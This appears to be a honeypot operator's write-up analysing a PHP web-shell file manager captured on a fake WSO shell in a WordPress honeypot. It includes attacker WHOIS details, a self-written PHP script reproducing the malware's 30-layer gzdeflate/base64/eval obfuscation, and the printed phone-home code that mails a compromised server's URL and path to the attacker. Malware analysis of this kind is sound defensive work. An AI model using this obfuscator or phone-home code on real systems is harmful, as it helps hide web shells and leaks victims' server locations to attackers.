A home grown file manager, with a phone home.
* TeaM HacKer EgypT - a simple Web-based file manager
* Copyright (C) 2004 TeaM HacKer EgypT <I0X0@HOTMAIL.COM>
Licensed under GNU GPL v2. Damned nice of them.
TeaM HacKer EgypT even has a Facebook page. Touching.
The attacker believed the file would be downloaded by an
instance of WSO, Web Shell by oRb,
using "FilesMan" action, "uploadFile" sub-action.
It should have ended up in a file
/var/www/html/wordpress//wp-content/plugins/wp-mobile-detector/cache/admin.php.
But it was a fake WSO, part of a WordPress honey pot,
so it's here to amuse you.
37.160.35.41.in-addr.arpa name = host-41.35.160.37.tedata.net.
"host-41.35.160.37.tedata.net" does not have an A record.
tedata.net is a GoDaddy.com domain, with an Egyptian registrant:
Domain Name: TEDATA.NET
Registry Domain ID: 73801006_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2017-06-29T11:58:58Z
Creation Date: 2001-06-28T14:13:59Z
Registrar Registration Expiration Date: 2018-06-28T14:13:58Z
Registrant Street: 94 Tahrir St.
Registrant City: Giza
Registrant State/Province: Giza
Registrant Postal Code: 12311
Registrant Country: EG
Tedious, but easy encoding: original source got gzdeflate(),
then base64_encode(), then eval(). For 30 levels.
I'm not going to keep all 30 intermediate files.
Apparently there used to be a web page that would do this encoding. This comment appears in the original, most-obfuscated, code:
/*
online encode by cha88.cn!
*/
I could only find a pale imitation of it, so I wrote my own version, just to test it:
#!/usr/bin/env php
<?php
$count = $argv[1];
$filename = $argv[2];
$txt = file_get_contents($filename);
for ($i = 0; $i < $count; ++$i) {
$compressed = gzdeflate($txt);
$encoded = base64_encode($compressed);
$txt = 'eval(gzinflate(base64_decode("'.$encoded.'")));';
}
print $txt;
The PHP downloaded is in fact a simple, fast file manager:
Each file can be copied, downloaded, or serve as the target of a symbolic link. That's about it except for the Phone Home.
Since WSO can do all that this simple, fast file manager can do, and much more, the question becomes why download this via WSO? You've got the WSO password, just use WSO's functions. I can think of two reasons:
- You don't know what WSO can do
- You want people to use this file manager, so you can receive the phone homes. This doesn't entirely seem worth it, because nothing other than the file manager's URL makes it into the info phoned home.
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
$to = "dj_vista16@hotmail.com";
$subject = "EGFM";
$header = "from: EGFM <dj_vista16@hotmail.com>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
}
A pastebin with the same phone home. I guess ol' dj_vista16 has been busy.